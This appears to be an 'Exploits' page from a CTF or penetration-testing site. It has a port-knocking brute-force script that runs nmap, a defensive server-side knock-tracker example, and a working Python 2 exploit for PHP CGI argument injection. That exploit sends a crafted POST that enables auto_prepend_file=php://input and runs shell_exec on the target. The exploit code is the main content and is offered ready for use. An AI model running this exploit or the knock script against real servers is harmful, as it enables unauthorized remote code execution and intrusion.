
Exploits



Port Knocking

In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific ports. A variant called single packet authorization (SPA) exists, where only a single "knock" is needed, consisting of an encrypted packet.

The primary purpose of port knocking is to prevent an attacker from scanning a system for potentially exploitable services by doing a port scan, because unless the attacker sends the correct knock sequence, the protected ports will appear closed.
Many CTFs use port knocking as a network challenge. Below you can find a script that automates the process. If you find an open port running a "waste" service (one that only hands out a list of port numbers), you can try the script below.

import socket
from itertools import permutations
import time
import os
import ast

ip = "192.168.0.107"  # Machine ip
Port = 1337  # Machine port

# The challenge service hands out the candidate ports as a Python list literal
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, Port))
port_list = ast.literal_eval(s.recv(1024).decode())  # parse the list without eval()
print("# received ports: ", port_list)
for seq in permutations(port_list, 3):
    print("-> Sequence: ", seq)
    # Knock on each port of the candidate sequence in turn. The ports are closed,
    # so the connect() calls are expected to fail; errors are ignored.
    for port in seq:
        s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s2.settimeout(1)
        try:
            s2.connect((ip, port))
            print(s2.recv(1024))
        except OSError:
            pass
        finally:
            s2.close()
    time.sleep(1)
os.system("nmap -F " + ip)
print("$ Done !!!")
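The server side of what the first paragraph of this section describes, as an added example that is not part of the original post: a knock daemon watches connection attempts to closed ports and admits a source only after the whole sequence arrives in order and within a time limit. The knock sequence, the timeout and the sample log entries are constructed assumptions; a real daemon would go on to insert a firewall rule, which here is only recorded in `opened`.

```python
# Constructed knock sequence and policy (assumptions, not values from the post)
KNOCK_SEQUENCE = (7000, 9000, 8000)  # non-monotonic, so an ascending port scan cannot complete it by accident
KNOCK_TIMEOUT = 10.0                 # max seconds allowed between consecutive knocks

class KnockTracker:
    """Server-side view of port knocking: each source advances a counter when it
    hits the next expected closed port; a wrong port or a stale knock resets it."""
    def __init__(self, sequence=KNOCK_SEQUENCE, timeout=KNOCK_TIMEOUT):
        self.sequence, self.timeout = tuple(sequence), timeout
        self.states = {}   # src_ip -> [knocks matched so far, time of last knock]
        self.opened = {}   # src_ip -> time the firewall rule was opened

    def observe(self, src_ip, dst_port, now):
        """Feed one connection attempt to a closed port. Returns True exactly when
        this attempt completes the sequence for src_ip."""
        st = self.states.setdefault(src_ip, [0, 0.0])
        if st[0] and now - st[1] > self.timeout:
            st[0] = 0                        # too slow: start over
        if dst_port == self.sequence[st[0]]:
            st[0] += 1
        elif dst_port == self.sequence[0]:
            st[0] = 1                        # a repeated first knock restarts cleanly
        else:
            st[0] = 0                        # out-of-order port: reset
        st[1] = now
        if st[0] == len(self.sequence):
            st[0] = 0
            self.opened[src_ip] = now
            return True
        return False

    def is_open(self, src_ip):
        return src_ip in self.opened

def replay(attempts, tracker=None):
    """attempts: iterable of (time, src_ip, dst_port); returns the sources admitted, in order."""
    tracker = tracker or KnockTracker()
    return [ip for t, ip, port in attempts if tracker.observe(ip, port, t)]

# Constructed firewall log of SYNs to closed ports: (time, source, destination port)
SAMPLE = [
    (0.0, "10.0.0.5", 7000), (1.0, "10.0.0.5", 9000), (2.0, "10.0.0.5", 8000),   # correct order
    (0.0, "10.0.0.9", 7000), (1.0, "10.0.0.9", 8000), (2.0, "10.0.0.9", 9000),   # ascending scan
    (0.0, "10.0.0.7", 7000), (1.0, "10.0.0.7", 9000), (30.0, "10.0.0.7", 8000),  # knocks too slow
]
```

Running `replay(SAMPLE)` admits only 10.0.0.5; the ascending sweep and the slow knocker both reset, which is why the timeout and a non-monotonic sequence matter for the scan-resistance claimed above.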




PHP CGI Argument Injection

PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. When PHP runs in a CGI-based setup (such as Apache's mod_cgid), php-cgi receives the processed query string as command-line arguments, which lets command-line switches such as -s, -d or -c be passed to the php-cgi binary; this can be exploited to disclose source code and obtain arbitrary code execution. For more, read here.
Usage: python file.py 192.168.0.100 80

# Use Python2
import socket
import sys

def cgi_exploit():
    pwn_code = """<?php
$output=shell_exec('whoami');
echo "<pre>$output</pre>";
?>"""
    post_Length = len(pwn_code)
    # %%3d survives the %-formatting below as %3d, the URL-encoded '='
    http_raw = """POST /phpMyAdmin/?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %s

%s
""" % (HOST, post_Length, pwn_code)
    print http_raw
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((HOST, int(PORT)))
        sock.send(http_raw)
        data = sock.recv(10000)
        print repr(data)
        sock.close()
    except socket.error, msg:
        sys.stderr.write("[ERROR] %s\n" % msg[1])
        sys.exit(1)

if __name__ == '__main__':
    try:
        HOST = sys.argv[1]
        PORT = sys.argv[2]
        cgi_exploit()
    except IndexError:
        print '[+]Usage: cgi_test.py site.com 80'
        sys.exit(-1)




Remote Windows Kernel Crash

Coming Soon...




